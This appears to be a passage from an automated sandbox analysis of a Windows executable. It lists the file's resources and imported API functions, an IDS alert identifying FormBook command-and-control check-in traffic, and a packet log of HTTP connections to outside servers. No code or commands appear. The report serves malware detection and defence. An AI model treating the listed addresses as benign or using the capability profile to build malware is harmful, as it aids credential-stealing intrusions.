RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x59b77	data			1.0003292705161384
RT_GROUP_ICON	0x129330	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1293a8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1293bc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1293d0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1293e4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1294c0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T01:40:11.996083+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.5	49954	134.0.14.158	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:39:52.805749893 CET	49843	80	192.168.2.5	104.21.36.62
Jan 11, 2025 01:39:52.810715914 CET	80	49843	104.21.36.62	192.168.2.5
Jan 11, 2025 01:39:52.810828924 CET	49843	80	192.168.2.5	104.21.36.62
Jan 11, 2025 01:39:52.821410894 CET	49843	80	192.168.2.5	104.21.36.62
Jan 11, 2025 01:39:52.826287031 CET	80	49843	104.21.36.62	192.168.2.5
Jan 11, 2025 01:39:53.476918936 CET	80	49843	104.21.36.62	192.168.2.5
Jan 11, 2025 01:39:53.476967096 CET	80	49843	104.21.36.62	192.168.2.5
Jan 11, 2025 01:39:53.477006912 CET	80	49843	104.21.36.62	192.168.2.5
Jan 11, 2025 01:39:53.477174997 CET	49843	80	192.168.2.5	104.21.36.62
Jan 11, 2025 01:39:53.488223076 CET	49843	80	192.168.2.5	104.21.36.62
Jan 11, 2025 01:39:53.493117094 CET	80	49843	104.21.36.62	192.168.2.5
Jan 11, 2025 01:40:08.573889017 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:08.578783035 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:08.579334974 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:08.593410969 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:08.598259926 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.530838013 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.530857086 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.530870914 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.530942917 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.530955076 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.530966043 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.530978918 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.530992031 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.531002998 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.531016111 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.531013966 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.531050920 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.531073093 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.537009954 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.537024975 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.537094116 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.674052000 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687032938 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687050104 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687057972 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687122107 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687135935 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687155962 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.687202930 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.687283039 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687446117 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687464952 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687493086 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.687957048 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.687967062 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.688013077 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.688093901 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.688138008 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.688235044 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.688466072 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.688477039 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.688489914 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.688503027 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.688525915 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.688607931 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.689145088 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.689156055 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.689168930 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.689181089 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.689192057 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.689214945 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.689275026 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.689315081 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.694758892 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.694776058 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.694783926 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.694896936 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.782099009 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.782115936 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.782150030 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.782161951 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.782241106 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.782294035 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.789038897 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789055109 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789067030 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789119005 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.789165020 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789176941 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789190054 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789206028 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.789263010 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.789294004 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789438009 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789448977 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789460897 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.789479017 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.789499998 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.790314913 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.790328026 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.790340900 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.790353060 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.790384054 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.790406942 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:09.790720940 CET	80	49941	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:09.790764093 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:10.098432064 CET	49941	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:11.115616083 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:11.120533943 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.120640993 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:11.134444952 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:11.139369011 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.995790005 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.995878935 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.995891094 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.995903969 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.995915890 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.995928049 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.995954037 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.996020079 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.996033907 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.996048927 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:11.996083021 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:11.996139050 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.001015902 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.001032114 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.001044989 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.001056910 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.001086950 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.001121044 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.086316109 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100058079 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100123882 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.100136995 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100150108 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100162983 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100174904 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100187063 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.100244045 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.100492954 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100512028 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100523949 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100536108 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100548983 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.100553989 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.100575924 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.101375103 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.101393938 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.101407051 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.101418018 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.101419926 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.101430893 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.101437092 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.101464033 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.102123022 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.102221966 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.102241039 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.102252960 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.102262974 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.102263927 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.102279902 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.104924917 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.105010033 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.105012894 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.105026007 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.105068922 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.190833092 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.190875053 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.190995932 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.204555035 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204607010 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204619884 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204632044 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204643965 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204655886 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204668045 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204725027 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.204770088 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.204869986 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204881907 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204895020 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204905987 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204917908 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.204921007 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.204938889 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.204961061 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.205205917 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.205250025 CET	80	49954	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:12.205301046 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:12.653747082 CET	49954	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:13.662288904 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:13.667121887 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:13.667241096 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:13.679163933 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:13.684043884 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:13.684096098 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509183884 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509200096 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509213924 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509234905 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509257078 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509273052 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509287119 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509300947 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509309053 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.509309053 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.509315014 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509330034 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.509351015 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.509351015 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.511373997 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.514245033 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.514260054 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.514276028 CET	80	49972	134.0.14.158	192.168.2.5
